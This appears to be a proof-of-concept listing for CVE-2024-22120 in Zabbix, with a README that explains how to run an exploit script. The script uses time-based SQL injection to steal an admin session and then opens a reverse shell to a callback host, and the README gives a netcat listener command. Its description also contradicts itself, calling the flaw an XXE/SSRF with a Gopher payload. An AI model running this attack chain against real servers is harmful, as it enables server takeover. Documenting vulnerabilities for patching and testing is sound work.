
CVE-2024-22120 PoC — Zabbix Security Vulnerability

Source
Associated Vulnerability
Title: Zabbix Security Vulnerability (CVE-2024-22120)
Description: Zabbix is an open-source monitoring system from Zabbix LLC. It supports network, server, cloud and application monitoring. Zabbix contains a security vulnerability caused by a field that is not properly sanitized, which leads to a time-based blind SQL injection.
Description
This is my exploit for CVE-2024-22120, which involves an SSRF vulnerability inside an XXE with a Gopher payload.
Readme
# Usage

```bash
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
```

### Example Scenario
You have identified a Zabbix server running on IP `192.168.1.100`, and you have access to a low-privileged user with the following details:
- Session ID (`sid`): `d82bf6715e1d3c1f25`
- Host ID (`hostid`): `10107`
- PHP session ID (`phpsessid`): `a4g7f48d9j3r7h8s9g`

You want to exploit the RCE vulnerability using this script.

### Running the Script

```bash
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
```

### Parameter Explanation:
- `--ip 192.168.1.100`: The IP address of the Zabbix server.
- `--sid d82bf6715e1d3c1f25`: The session ID of a low-privileged user.
- `--hostid 10107`: The ID of a host that the low-privileged user can access.
- `--phpsessid a4g7f48d9j3r7h8s9g`: The PHP session ID used to authenticate requests.
- `--false_time 1`: Time in seconds to sleep in case of a wrong guess during the SQL injection (default is 1 second).
- `--true_time 3`: Time in seconds to sleep in case of a correct guess during the SQL injection (default is 3 seconds).

### What Happens Next:
1. The script will start by attempting to extract the admin session ID using a time-based SQL injection.
2. Once the admin session ID is obtained, the script will create a reverse shell script on the Zabbix server.
3. Finally, the script will execute the reverse shell, connecting back to your machine on the specified IP and port (`10.0.46.27:5555` in the script).

### Notes:
- Make sure that your machine is listening on the specified port (`5555` in the script) to catch the reverse shell. You can use `netcat` for this:

  ```bash
  nc -lvnp 5555
  ```

- Replace the IP `10.0.46.27` and port `5555` in the `CreateScript` function with your own IP and desired port to receive the reverse shell.

File Snapshot

```
[4.0K] /data/pocs/f37b9c3d6e241a04f85caf22de475ae20118b042
├── [6.2K] exploit.py
└── [1.9K] README.md

0 directories, 2 files
```